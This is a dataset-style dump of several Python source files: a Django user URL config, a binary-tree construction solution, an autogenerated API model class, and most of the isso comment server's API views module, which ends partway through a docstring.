ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 7dfab8d687cb4d90230788d66b49036c88519e27 | from django.urls import path
from user import views
app_name = 'user'
urlpatterns = [
path('create/', views.CreateUserView.as_view(), name='create'),
path('token/', views.CreateTokenView.as_view(), name='token'),
path('me/', views.ManageUserView.as_view(), name='me'),
]
|
py | 7dfab8ed1422bded65ffc0b5d8a49608c9b9b239 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:
def dfs(stop):
if preorder and inorder[-1] != stop:
root = TreeNode(preorder.pop())
root.left = dfs(root.val)
inorder.pop()
root.right = dfs(stop)
return root
preorder.reverse()
inorder.reverse()
return dfs(None) |
py | 7dfab9c7066087018ae0e43a33c22b383787a503 | # -*- coding: utf-8 -*-
"""
idfy_rest_client.models.template_with_id_preview
This file was automatically generated for Idfy by APIMATIC v2.0 ( https://apimatic.io )
"""
class TemplateWithIdPreview(object):
"""Implementation of the 'TemplateWithIdPreview' model.
TODO: type model description here.
Attributes:
primary_language (PrimaryLanguage): Primary language to use in the
preview (required)
secondary_language (SecondaryLanguage): Secondary language to use in
the prewview (optional)
xml_signature (string): Xml package signature in base64 encoding
"""
# Create a mapping from Model property names to API property names
_names = {
"primary_language":'PrimaryLanguage',
"secondary_language":'SecondaryLanguage',
"xml_signature":'XmlSignature'
}
def __init__(self,
primary_language=None,
secondary_language=None,
xml_signature=None,
additional_properties = {}):
"""Constructor for the TemplateWithIdPreview class"""
# Initialize members of the class
self.primary_language = primary_language
self.secondary_language = secondary_language
self.xml_signature = xml_signature
# Add additional model properties to the instance
self.additional_properties = additional_properties
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
primary_language = dictionary.get('PrimaryLanguage')
secondary_language = dictionary.get('SecondaryLanguage')
xml_signature = dictionary.get('XmlSignature')
# Clean out expected properties from dictionary
for key in cls._names.values():
if key in dictionary:
del dictionary[key]
# Return an object of this model
return cls(primary_language,
secondary_language,
xml_signature,
dictionary)
|
py | 7dfabafde754ee4c2415226dce47623e2671630f | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import collections
import re
import time
import functools
import json # json.dumps to put URL in <script>
from datetime import datetime, timedelta
from itsdangerous import SignatureExpired, BadSignature
from xml.etree import ElementTree as ET
from werkzeug.http import dump_cookie
from werkzeug.wsgi import get_current_url
from werkzeug.utils import redirect
from werkzeug.routing import Rule
from werkzeug.wrappers import Response
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from isso.compat import text_type as str
from isso import utils, local
from isso.utils import (http, parse,
JSONResponse as JSON, XMLResponse as XML,
render_template)
from isso.views import requires
from isso.utils.hash import sha1
from isso.utils.hash import md5
try:
from cgi import escape
except ImportError:
from html import escape
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
# from Django appearently, looks good to me *duck*
__url_re = re.compile(
r'^'
r'(https?://)?'
# domain...
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)'
r'$', re.IGNORECASE)
def isurl(text):
return __url_re.match(text) is not None
def normalize(url):
if not url.startswith(("http://", "https://")):
return "http://" + url
return url
def xhr(func):
"""A decorator to check for CSRF on POST/PUT/DELETE using a <form>
element and JS to execute automatically (see #40 for a proof-of-concept).
When an attacker uses a <form> to downvote a comment, the browser *should*
add a `Content-Type: ...` header with three possible values:
* application/x-www-form-urlencoded
* multipart/form-data
* text/plain
If the header is not sent or requests `application/json`, the request is
not forged (XHR is restricted by CORS separately).
"""
"""
@apiDefine csrf
@apiHeader {string="application/json"} Content-Type
The content type must be set to `application/json` to prevent CSRF attacks.
"""
def dec(self, env, req, *args, **kwargs):
if req.content_type and not req.content_type.startswith("application/json"):
raise Forbidden("CSRF")
return func(self, env, req, *args, **kwargs)
return dec
class API(object):
FIELDS = set(['id', 'parent', 'text', 'author', 'website',
'mode', 'created', 'modified', 'likes', 'dislikes', 'hash', 'gravatar_image', 'notification'])
# comment fields, that can be submitted
ACCEPT = set(['text', 'author', 'website', 'email', 'parent', 'title', 'notification'])
VIEWS = [
('fetch', ('GET', '/')),
('new', ('POST', '/new')),
('count', ('GET', '/count')),
('counts', ('POST', '/count')),
('feed', ('GET', '/feed')),
('latest', ('GET', '/latest')),
('view', ('GET', '/id/<int:id>')),
('edit', ('PUT', '/id/<int:id>')),
('delete', ('DELETE', '/id/<int:id>')),
('unsubscribe', ('GET', '/id/<int:id>/unsubscribe/<string:email>/<string:key>')),
('moderate', ('GET', '/id/<int:id>/<any(edit,activate,delete):action>/<string:key>')),
('moderate', ('POST', '/id/<int:id>/<any(edit,activate,delete):action>/<string:key>')),
('like', ('POST', '/id/<int:id>/like')),
('dislike', ('POST', '/id/<int:id>/dislike')),
('demo', ('GET', '/demo')),
('preview', ('POST', '/preview')),
('login', ('POST', '/login')),
('admin', ('GET', '/admin'))
]
def __init__(self, isso, hasher):
self.isso = isso
self.hash = hasher.uhash
self.cache = isso.cache
self.signal = isso.signal
self.conf = isso.conf.section("general")
self.moderated = isso.conf.getboolean("moderation", "enabled")
# this is similar to the wordpress setting "Comment author must have a previously approved comment"
self.approve_if_email_previously_approved = isso.conf.getboolean("moderation", "approve-if-email-previously-approved")
self.guard = isso.db.guard
self.threads = isso.db.threads
self.comments = isso.db.comments
for (view, (method, path)) in self.VIEWS:
isso.urls.add(
Rule(path, methods=[method], endpoint=getattr(self, view)))
@classmethod
def verify(cls, comment):
if "text" not in comment:
return False, "text is missing"
if not isinstance(comment.get("parent"), (int, type(None))):
return False, "parent must be an integer or null"
for key in ("text", "author", "website", "email"):
if not isinstance(comment.get(key), (str, type(None))):
return False, "%s must be a string or null" % key
if len(comment["text"].rstrip()) < 3:
return False, "text is too short (minimum length: 3)"
if len(comment["text"]) > 65535:
return False, "text is too long (maximum length: 65535)"
if len(comment.get("email") or "") > 254:
return False, "http://tools.ietf.org/html/rfc5321#section-4.5.3"
if comment.get("website"):
if len(comment["website"]) > 254:
return False, "arbitrary length limit"
if not isurl(comment["website"]):
return False, "Website not Django-conform"
return True, ""
# Common definitions for apidoc follow:
"""
@apiDefine plainParam
@apiParam {number=0,1} [plain]
Iff set to `1`, the plain text entered by the user will be returned in the comments’ `text` attribute (instead of the rendered markdown).
"""
"""
@apiDefine commentResponse
@apiSuccess {number} id
The comment’s id (assigned by the server).
@apiSuccess {number} parent
Id of the comment this comment is a reply to. `null` if this is a top-level-comment.
@apiSuccess {number=1,2,4} mode
The comment’s mode:
value | explanation
--- | ---
`1` | accepted: The comment was accepted by the server and is published.
`2` | in moderation queue: The comment was accepted by the server but awaits moderation.
`4` | deleted, but referenced: The comment was deleted on the server but is still referenced by replies.
@apiSuccess {string} author
The comments’s author’s name or `null`.
@apiSuccess {string} website
The comment’s author’s website or `null`.
@apiSuccess {string} hash
A hash uniquely identifying the comment’s author.
@apiSuccess {number} created
UNIX timestamp of the time the comment was created (on the server).
@apiSuccess {number} modified
UNIX timestamp of the time the comment was last modified (on the server). `null` if the comment was not yet modified.
"""
"""
@api {post} /new create new
@apiGroup Comment
@apiDescription
Creates a new comment. The response will set a cookie on the requestor to enable them to later edit the comment.
@apiUse csrf
@apiParam {string} uri
The uri of the thread to create the comment on.
@apiParam {string} text
The comment’s raw text.
@apiParam {string} [author]
The comment’s author’s name.
@apiParam {string} [email]
The comment’s author’s email address.
@apiParam {string} [website]
The comment’s author’s website’s url.
@apiParam {number} [parent]
The parent comment’s id iff the new comment is a response to an existing comment.
@apiExample {curl} Create a reply to comment with id 15:
curl 'https://comments.example.com/new?uri=/thread/' -d '{"text": "Stop saying that! *isso*!", "author": "Max Rant", "email": "[email protected]", "parent": 15}' -H 'Content-Type: application/json' -c cookie.txt
@apiUse commentResponse
@apiSuccessExample Success after the above request:
{
"website": null,
"author": "Max Rant",
"parent": 15,
"created": 1464940838.254393,
"text": "<p>Stop saying that! <em>isso</em>!</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"hash": "e644f6ee43c0",
"id": 23,
"likes": 0
}
"""
@xhr
@requires(str, 'uri')
def new(self, environ, request, uri):
data = request.get_json()
for field in set(data.keys()) - API.ACCEPT:
data.pop(field)
for key in ("author", "email", "website", "parent"):
data.setdefault(key, None)
valid, reason = API.verify(data)
if not valid:
return BadRequest(reason)
for field in ("author", "email", "website"):
if data.get(field) is not None:
data[field] = escape(data[field], quote=False)
if data.get("website"):
data["website"] = normalize(data["website"])
data['mode'] = 2 if self.moderated else 1
data['remote_addr'] = utils.anonymize(str(request.remote_addr))
with self.isso.lock:
if uri not in self.threads:
if 'title' not in data:
with http.curl('GET', local("origin"), uri) as resp:
if resp and resp.status == 200:
uri, title = parse.thread(resp.read(), id=uri)
else:
return NotFound('URI does not exist %s')
else:
title = data['title']
thread = self.threads.new(uri, title)
self.signal("comments.new:new-thread", thread)
else:
thread = self.threads[uri]
# notify extensions that the new comment is about to save
self.signal("comments.new:before-save", thread, data)
valid, reason = self.guard.validate(uri, data)
if not valid:
self.signal("comments.new:guard", reason)
raise Forbidden(reason)
with self.isso.lock:
# if email-based auto-moderation enabled, check for previously approved author
# right before approval.
if self.approve_if_email_previously_approved and self.comments.is_previously_approved_author(data['email']):
data['mode'] = 1
rv = self.comments.add(uri, data)
# notify extension, that the new comment has been successfully saved
self.signal("comments.new:after-save", thread, rv)
cookie = functools.partial(dump_cookie,
value=self.isso.sign(
[rv["id"], sha1(rv["text"])]),
max_age=self.conf.getint('max-age'))
rv["text"] = self.isso.render(rv["text"])
rv["hash"] = self.hash(rv['email'] or rv['remote_addr'])
self.cache.set(
'hash', (rv['email'] or rv['remote_addr']).encode('utf-8'), rv['hash'])
rv = self._add_gravatar_image(rv)
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
# success!
self.signal("comments.new:finish", thread, rv)
resp = JSON(rv, 202 if rv["mode"] == 2 else 201)
resp.headers.add("Set-Cookie", cookie(str(rv["id"])))
resp.headers.add("X-Set-Cookie", cookie("isso-%i" % rv["id"]))
return resp
"""
@api {get} /id/:id view
@apiGroup Comment
@apiParam {number} id
The id of the comment to view.
@apiUse plainParam
@apiExample {curl} View the comment with id 4:
curl 'https://comments.example.com/id/4'
@apiUse commentResponse
@apiSuccessExample Example result:
{
"website": null,
"author": null,
"parent": null,
"created": 1464914341.312426,
"text": " <p>I want to use MySQL</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"id": 4,
"likes": 1
}
"""
def view(self, environ, request, id):
rv = self.comments.get(id)
if rv is None:
raise NotFound
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
if request.args.get('plain', '0') == '0':
rv['text'] = self.isso.render(rv['text'])
return JSON(rv, 200)
"""
@api {put} /id/:id edit
@apiGroup Comment
@apiDescription
Edit an existing comment. Editing a comment is only possible for a short period of time after it was created and only if the requestor has a valid cookie for it. See the [isso server documentation](https://posativ.org/isso/docs/configuration/server) for details. Editing a comment will set a new edit cookie in the response.
@apiUse csrf
@apiParam {number} id
The id of the comment to edit.
@apiParam {string} text
A new (raw) text for the comment.
@apiParam {string} [author]
The modified comment’s author’s name.
@apiParam {string} [webiste]
The modified comment’s author’s website.
@apiExample {curl} Edit comment with id 23:
curl -X PUT 'https://comments.example.com/id/23' -d {"text": "I see your point. However, I still disagree.", "website": "maxrant.important.com"} -H 'Content-Type: application/json' -b cookie.txt
@apiUse commentResponse
@apiSuccessExample Example response:
{
"website": "maxrant.important.com",
"author": "Max Rant",
"parent": 15,
"created": 1464940838.254393,
"text": "<p>I see your point. However, I still disagree.</p>",
"dislikes": 0,
"modified": 1464943439.073961,
"mode": 1,
"id": 23,
"likes": 0
}
"""
@xhr
def edit(self, environ, request, id):
try:
rv = self.isso.unsign(request.cookies.get(str(id), ''))
except (SignatureExpired, BadSignature):
raise Forbidden
if rv[0] != id:
raise Forbidden
# verify checksum, mallory might skip cookie deletion when he deletes a comment
if rv[1] != sha1(self.comments.get(id)["text"]):
raise Forbidden
data = request.get_json()
if "text" not in data or data["text"] is None or len(data["text"]) < 3:
raise BadRequest("no text given")
for key in set(data.keys()) - set(["text", "author", "website"]):
data.pop(key)
data['modified'] = time.time()
with self.isso.lock:
rv = self.comments.update(id, data)
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
self.signal("comments.edit", rv)
cookie = functools.partial(dump_cookie,
value=self.isso.sign(
[rv["id"], sha1(rv["text"])]),
max_age=self.conf.getint('max-age'))
rv["text"] = self.isso.render(rv["text"])
resp = JSON(rv, 200)
resp.headers.add("Set-Cookie", cookie(str(rv["id"])))
resp.headers.add("X-Set-Cookie", cookie("isso-%i" % rv["id"]))
return resp
"""
@api {delete} '/id/:id' delete
@apiGroup Comment
@apiDescription
Delte an existing comment. Deleting a comment is only possible for a short period of time after it was created and only if the requestor has a valid cookie for it. See the [isso server documentation](https://posativ.org/isso/docs/configuration/server) for details.
@apiParam {number} id
Id of the comment to delete.
@apiExample {curl} Delete comment with id 14:
curl -X DELETE 'https://comments.example.com/id/14' -b cookie.txt
@apiSuccessExample Successful deletion returns null:
null
"""
@xhr
def delete(self, environ, request, id, key=None):
try:
rv = self.isso.unsign(request.cookies.get(str(id), ""))
except (SignatureExpired, BadSignature):
raise Forbidden
else:
if rv[0] != id:
raise Forbidden
# verify checksum, mallory might skip cookie deletion when he deletes a comment
if rv[1] != sha1(self.comments.get(id)["text"]):
raise Forbidden
item = self.comments.get(id)
if item is None:
raise NotFound
self.cache.delete(
'hash', (item['email'] or item['remote_addr']).encode('utf-8'))
with self.isso.lock:
rv = self.comments.delete(id)
if rv:
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
self.signal("comments.delete", id)
resp = JSON(rv, 200)
cookie = functools.partial(dump_cookie, expires=0, max_age=0)
resp.headers.add("Set-Cookie", cookie(str(id)))
resp.headers.add("X-Set-Cookie", cookie("isso-%i" % id))
return resp
"""
@api {get} /id/:id/:email/key unsubscribe
@apiGroup Comment
@apiDescription
Opt out from getting any further email notifications about replies to a particular comment. In order to use this endpoint, the requestor needs a `key` that is usually obtained from an email sent out by isso.
@apiParam {number} id
The id of the comment to unsubscribe from replies to.
@apiParam {string} email
The email address of the subscriber.
@apiParam {string} key
The key to authenticate the subscriber.
@apiExample {curl} Unsubscribe Alice from replies to comment with id 13:
curl -X GET 'https://comments.example.com/id/13/unsubscribe/[email protected]/WyJ1bnN1YnNjcmliZSIsImFsaWNlQGV4YW1wbGUuY29tIl0.DdcH9w.Wxou-l22ySLFkKUs7RUHnoM8Kos'
@apiSuccessExample {html} Using GET:
<!DOCTYPE html>
<html>
<head>
<script>
if (confirm('Delete: Are you sure?')) {
xhr = new XMLHttpRequest;
xhr.open('POST', window.location.href);
xhr.send(null);
}
</script>
@apiSuccessExample Using POST:
Yo
"""
def unsubscribe(self, environ, request, id, email, key):
email = unquote(email)
try:
rv = self.isso.unsign(key, max_age=2**32)
except (BadSignature, SignatureExpired):
raise Forbidden
if rv[0] != 'unsubscribe' or rv[1] != email:
raise Forbidden
item = self.comments.get(id)
if item is None:
raise NotFound
with self.isso.lock:
self.comments.unsubscribe(email, id)
modal = (
"<!DOCTYPE html>"
"<html>"
"<head>"
" <title>Successfully unsubscribed</title>"
"</head>"
"<body>"
" <p>You have been unsubscribed from replies in the given conversation.</p>"
"</body>"
"</html>")
return Response(modal, 200, content_type="text/html")
"""
@api {post} /id/:id/:action/key moderate
@apiGroup Comment
@apiDescription
Publish or delete a comment that is in the moderation queue (mode `2`). In order to use this endpoint, the requestor needs a `key` that is usually obtained from an email sent out by isso.
This endpoint can also be used with a `GET` request. In that case, a html page is returned that asks the user whether they are sure to perform the selected action. If they select “yes”, the query is repeated using `POST`.
@apiParam {number} id
The id of the comment to moderate.
@apiParam {string=activate,delete} action
`activate` to publish the comment (change its mode to `1`).
`delete` to delete the comment
@apiParam {string} key
The moderation key to authenticate the moderation.
@apiExample {curl} delete comment with id 13:
curl -X POST 'https://comments.example.com/id/13/delete/MTM.CjL6Fg.REIdVXa-whJS_x8ojQL4RrXnuF4'
@apiSuccessExample {html} Using GET:
<!DOCTYPE html>
<html>
<head>
<script>
if (confirm('Delete: Are you sure?')) {
xhr = new XMLHttpRequest;
xhr.open('POST', window.location.href);
xhr.send(null);
xhr.onload = function() {
window.location.href = "https://example.com/example-thread/#isso-13";
};
}
</script>
@apiSuccessExample Using POST:
Yo
"""
def moderate(self, environ, request, id, action, key):
try:
id = self.isso.unsign(key, max_age=2**32)
except (BadSignature, SignatureExpired):
raise Forbidden
item = self.comments.get(id)
thread = self.threads.get(item['tid'])
link = local("origin") + thread["uri"] + "#isso-%i" % item["id"]
if item is None:
raise NotFound
if request.method == "GET":
modal = (
"<!DOCTYPE html>"
"<html>"
"<head>"
"<script>"
" if (confirm('%s: Are you sure?')) {"
" xhr = new XMLHttpRequest;"
" xhr.open('POST', window.location.href);"
" xhr.send(null);"
" xhr.onload = function() {"
" window.location.href = %s;"
" };"
" }"
"</script>" % (action.capitalize(), json.dumps(link)))
return Response(modal, 200, content_type="text/html")
if action == "activate":
if item['mode'] == 1:
return Response("Already activated", 200)
with self.isso.lock:
self.comments.activate(id)
self.signal("comments.activate", thread, item)
return Response("Yo", 200)
elif action == "edit":
data = request.get_json()
with self.isso.lock:
rv = self.comments.update(id, data)
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
self.signal("comments.edit", rv)
return JSON(rv, 200)
else:
with self.isso.lock:
self.comments.delete(id)
self.cache.delete(
'hash', (item['email'] or item['remote_addr']).encode('utf-8'))
self.signal("comments.delete", id)
return Response("Yo", 200)
"""
@api {get} / get comments
@apiGroup Thread
@apiDescription Queries the comments of a thread.
@apiParam {string} uri
The URI of thread to get the comments from.
@apiParam {number} [parent]
Return only comments that are children of the comment with the provided ID.
@apiUse plainParam
@apiParam {number} [limit]
The maximum number of returned top-level comments. Omit for unlimited results.
@apiParam {number} [nested_limit]
The maximum number of returned nested comments per commint. Omit for unlimited results.
@apiParam {number} [after]
Includes only comments were added after the provided UNIX timestamp.
@apiSuccess {number} total_replies
The number of replies if the `limit` parameter was not set. If `after` is set to `X`, this is the number of comments that were created after `X`. So setting `after` may change this value!
@apiSuccess {Object[]} replies
The list of comments. Each comment also has the `total_replies`, `replies`, `id` and `hidden_replies` properties to represent nested comments.
@apiSuccess {number} id
Id of the comment `replies` is the list of replies of. `null` for the list of toplevel comments.
@apiSuccess {number} hidden_replies
The number of comments that were ommited from the results because of the `limit` request parameter. Usually, this will be `total_replies` - `limit`.
@apiExample {curl} Get 2 comments with 5 responses:
curl 'https://comments.example.com/?uri=/thread/&limit=2&nested_limit=5'
@apiSuccessExample Example reponse:
{
"total_replies": 14,
"replies": [
{
"website": null,
"author": null,
"parent": null,
"created": 1464818460.732863,
"text": "<p>Hello, World!</p>",
"total_replies": 1,
"hidden_replies": 0,
"dislikes": 2,
"modified": null,
"mode": 1,
"replies": [
{
"website": null,
"author": null,
"parent": 1,
"created": 1464818460.769638,
"text": "<p>Hi, now some Markdown: <em>Italic</em>, <strong>bold</strong>, <code>monospace</code>.</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"hash": "2af4e1a6c96a",
"id": 2,
"likes": 2
}
],
"hash": "1cb6cc0309a2",
"id": 1,
"likes": 2
},
{
"website": null,
"author": null,
"parent": null,
"created": 1464818460.80574,
"text": "<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Accusantium at commodi cum deserunt dolore, error fugiat harum incidunt, ipsa ipsum mollitia nam provident rerum sapiente suscipit tempora vitae? Est, qui?</p>",
"total_replies": 0,
"hidden_replies": 0,
"dislikes": 0,
"modified": null,
"mode": 1,
"replies": [],
"hash": "1cb6cc0309a2",
"id": 3,
"likes": 0
},
"id": null,
"hidden_replies": 12
}
"""
@requires(str, 'uri')
def fetch(self, environ, request, uri):
args = {
'uri': uri,
'after': request.args.get('after', 0)
}
try:
args['limit'] = int(request.args.get('limit'))
except TypeError:
args['limit'] = None
except ValueError:
return BadRequest("limit should be integer")
if request.args.get('parent') is not None:
try:
args['parent'] = int(request.args.get('parent'))
root_id = args['parent']
except ValueError:
return BadRequest("parent should be integer")
else:
args['parent'] = None
root_id = None
plain = request.args.get('plain', '0') == '0'
reply_counts = self.comments.reply_count(uri, after=args['after'])
if args['limit'] == 0:
root_list = []
else:
root_list = list(self.comments.fetch(**args))
if root_id not in reply_counts:
reply_counts[root_id] = 0
try:
nested_limit = int(request.args.get('nested_limit'))
except TypeError:
nested_limit = None
except ValueError:
return BadRequest("nested_limit should be integer")
rv = {
'id': root_id,
'total_replies': reply_counts[root_id],
'hidden_replies': reply_counts[root_id] - len(root_list),
'replies': self._process_fetched_list(root_list, plain)
}
# We are only checking for one level deep comments
if root_id is None:
for comment in rv['replies']:
if comment['id'] in reply_counts:
comment['total_replies'] = reply_counts[comment['id']]
if nested_limit is not None:
if nested_limit > 0:
args['parent'] = comment['id']
args['limit'] = nested_limit
replies = list(self.comments.fetch(**args))
else:
replies = []
else:
args['parent'] = comment['id']
replies = list(self.comments.fetch(**args))
else:
comment['total_replies'] = 0
replies = []
comment['hidden_replies'] = comment['total_replies'] - \
len(replies)
comment['replies'] = self._process_fetched_list(replies, plain)
return JSON(rv, 200)
def _add_gravatar_image(self, item):
if not self.conf.getboolean('gravatar'):
return item
email = item['email'] or item['author'] or ''
email_md5_hash = md5(email)
gravatar_url = self.conf.get('gravatar-url')
item['gravatar_image'] = gravatar_url.format(email_md5_hash)
return item
def _process_fetched_list(self, fetched_list, plain=False):
for item in fetched_list:
key = item['email'] or item['remote_addr']
val = self.cache.get('hash', key.encode('utf-8'))
if val is None:
val = self.hash(key)
self.cache.set('hash', key.encode('utf-8'), val)
item['hash'] = val
item = self._add_gravatar_image(item)
for key in set(item.keys()) - API.FIELDS:
item.pop(key)
if plain:
for item in fetched_list:
item['text'] = self.isso.render(item['text'])
return fetched_list
"""
@apiDefine likeResponse
@apiSuccess {number} likes
The (new) number of likes on the comment.
@apiSuccess {number} dislikes
The (new) number of dislikes on the comment.
"""
"""
@api {post} /id/:id/like like
@apiGroup Comment
@apiDescription
Puts a “like” on a comment. The author of a comment cannot like its own comment.
@apiParam {number} id
The id of the comment to like.
@apiExample {curl} Like comment with id 23:
curl -X POST 'https://comments.example.com/id/23/like'
@apiUse likeResponse
@apiSuccessExample Example response
{
"likes": 5,
"dislikes": 2
}
"""
@xhr
def like(self, environ, request, id):
nv = self.comments.vote(
True, id, utils.anonymize(str(request.remote_addr)))
return JSON(nv, 200)
"""
@api {post} /id/:id/dislike dislike
@apiGroup Comment
@apiDescription
Puts a “dislike” on a comment. The author of a comment cannot dislike its own comment.
@apiParam {number} id
The id of the comment to dislike.
@apiExample {curl} Dislike comment with id 23:
curl -X POST 'https://comments.example.com/id/23/dislike'
@apiUse likeResponse
@apiSuccessExample Example response
{
"likes": 4,
"dislikes": 3
}
"""
@xhr
def dislike(self, environ, request, id):
nv = self.comments.vote(
False, id, utils.anonymize(str(request.remote_addr)))
return JSON(nv, 200)
# TODO: remove someday (replaced by :func:`counts`)
@requires(str, 'uri')
def count(self, environ, request, uri):
rv = self.comments.count(uri)[0]
if rv == 0:
raise NotFound
return JSON(rv, 200)
"""
@api {post} /count count comments
@apiGroup Thread
@apiDescription
Counts the number of comments on multiple threads. The requestor provides a list of thread uris. The number of comments on each thread is returned as a list, in the same order as the threads were requested. The counts include comments that are reponses to comments.
@apiExample {curl} get the count of 5 threads:
curl 'https://comments.example.com/count' -d '["/blog/firstPost.html", "/blog/controversalPost.html", "/blog/howToCode.html", "/blog/boringPost.html", "/blog/isso.html"]
@apiSuccessExample Counts of 5 threads:
[2, 18, 4, 0, 3]
"""
def counts(self, environ, request):
data = request.get_json()
if not isinstance(data, list) and not all(isinstance(x, str) for x in data):
raise BadRequest("JSON must be a list of URLs")
return JSON(self.comments.count(*data), 200)
"""
@api {get} /feed Atom feed for comments
@apiGroup Thread
@apiDescription
Provide an Atom feed for the given thread.
"""
@requires(str, 'uri')
def feed(self, environ, request, uri):
conf = self.isso.conf.section("rss")
if not conf.get('base'):
raise NotFound
args = {
'uri': uri,
'order_by': 'id',
'asc': 0,
'limit': conf.getint('limit')
}
try:
args['limit'] = max(int(request.args.get('limit')), args['limit'])
except TypeError:
pass
except ValueError:
return BadRequest("limit should be integer")
comments = self.comments.fetch(**args)
base = conf.get('base').rstrip('/')
hostname = urlparse(base).netloc
# Let's build an Atom feed.
# RFC 4287: https://tools.ietf.org/html/rfc4287
# RFC 4685: https://tools.ietf.org/html/rfc4685 (threading extensions)
# For IDs: http://web.archive.org/web/20110514113830/http://diveintomark.org/archives/2004/05/28/howto-atom-id
feed = ET.Element('feed', {
'xmlns': 'http://www.w3.org/2005/Atom',
'xmlns:thr': 'http://purl.org/syndication/thread/1.0'
})
# For feed ID, we would use thread ID, but we may not have
# one. Therefore, we use the URI. We don't have a year
# either...
id = ET.SubElement(feed, 'id')
id.text = 'tag:{hostname},2018:/isso/thread{uri}'.format(
hostname=hostname, uri=uri)
# For title, we don't have much either. Be pretty generic.
title = ET.SubElement(feed, 'title')
title.text = 'Comments for {hostname}{uri}'.format(
hostname=hostname, uri=uri)
comment0 = None
for comment in comments:
if comment0 is None:
comment0 = comment
entry = ET.SubElement(feed, 'entry')
# We don't use a real date in ID either to help with
# threading.
id = ET.SubElement(entry, 'id')
id.text = 'tag:{hostname},2018:/isso/{tid}/{id}'.format(
hostname=hostname,
tid=comment['tid'],
id=comment['id'])
title = ET.SubElement(entry, 'title')
title.text = 'Comment #{}'.format(comment['id'])
updated = ET.SubElement(entry, 'updated')
updated.text = '{}Z'.format(datetime.fromtimestamp(
comment['modified'] or comment['created']).isoformat())
author = ET.SubElement(entry, 'author')
name = ET.SubElement(author, 'name')
name.text = comment['author']
ET.SubElement(entry, 'link', {
'href': '{base}{uri}#isso-{id}'.format(
base=base,
uri=uri, id=comment['id'])
})
content = ET.SubElement(entry, 'content', {
'type': 'html',
})
content.text = self.isso.render(comment['text'])
if comment['parent']:
ET.SubElement(entry, 'thr:in-reply-to', {
'ref': 'tag:{hostname},2018:/isso/{tid}/{id}'.format(
hostname=hostname,
tid=comment['tid'],
id=comment['parent']),
'href': '{base}{uri}#isso-{id}'.format(
base=base,
uri=uri, id=comment['parent'])
})
# Updated is mandatory. If we have comments, we use the date
# of last modification of the first one (which is the last
# one). Otherwise, we use a fixed date.
updated = ET.Element('updated')
if comment0 is None:
updated.text = '1970-01-01T01:00:00Z'
else:
updated.text = datetime.fromtimestamp(
comment0['modified'] or comment0['created']).isoformat()
updated.text += 'Z'
feed.insert(0, updated)
output = StringIO()
ET.ElementTree(feed).write(output,
encoding='utf-8',
xml_declaration=True)
response = XML(output.getvalue(), 200)
# Add an etag/last-modified value for caching purpose
if comment0 is None:
response.set_etag('empty')
response.last_modified = 0
else:
response.set_etag('{tid}-{id}'.format(**comment0))
response.last_modified = comment0['modified'] or comment0['created']
return response.make_conditional(request)
def preview(self, environment, request):
data = request.get_json()
if "text" not in data or data["text"] is None:
raise BadRequest("no text given")
return JSON({'text': self.isso.render(data["text"])}, 200)
def demo(self, env, req):
return redirect(
get_current_url(env, strip_querystring=True) + '/index.html'
)
def login(self, env, req):
if not self.isso.conf.getboolean("admin", "enabled"):
isso_host_script = self.isso.conf.get("server", "public-endpoint") or local.host
return render_template('disabled.html', isso_host_script=isso_host_script)
data = req.form
password = self.isso.conf.get("admin", "password")
if data['password'] and data['password'] == password:
response = redirect(re.sub(
r'/login$',
'/admin',
get_current_url(env, strip_querystring=True)
))
cookie = functools.partial(dump_cookie,
value=self.isso.sign({"logged": True}),
expires=datetime.now() + timedelta(1))
response.headers.add("Set-Cookie", cookie("admin-session"))
response.headers.add("X-Set-Cookie", cookie("isso-admin-session"))
return response
else:
isso_host_script = self.isso.conf.get("server", "public-endpoint") or local.host
return render_template('login.html', isso_host_script=isso_host_script)
def admin(self, env, req):
isso_host_script = self.isso.conf.get("server", "public-endpoint") or local.host
if not self.isso.conf.getboolean("admin", "enabled"):
return render_template('disabled.html', isso_host_script=isso_host_script)
try:
data = self.isso.unsign(req.cookies.get('admin-session', ''),
max_age=60 * 60 * 24)
except BadSignature:
return render_template('login.html', isso_host_script=isso_host_script)
if not data or not data['logged']:
return render_template('login.html', isso_host_script=isso_host_script)
page_size = 100
page = int(req.args.get('page', 0))
order_by = req.args.get('order_by', None)
asc = int(req.args.get('asc', 1))
mode = int(req.args.get('mode', 2))
comments = self.comments.fetchall(mode=mode, page=page,
limit=page_size,
order_by=order_by,
asc=asc)
comments_enriched = []
for comment in list(comments):
comment['hash'] = self.isso.sign(comment['id'])
comments_enriched.append(comment)
comment_mode_count = self.comments.count_modes()
max_page = int(sum(comment_mode_count.values()) / 100)
return render_template('admin.html', comments=comments_enriched,
page=int(page), mode=int(mode),
conf=self.conf, max_page=max_page,
counts=comment_mode_count,
order_by=order_by, asc=asc,
isso_host_script=isso_host_script)
"""
@api {get} /latest latest
@apiGroup Comment
@apiDescription
Get the latest comments from the system, no matter which thread
@apiParam {number} limit
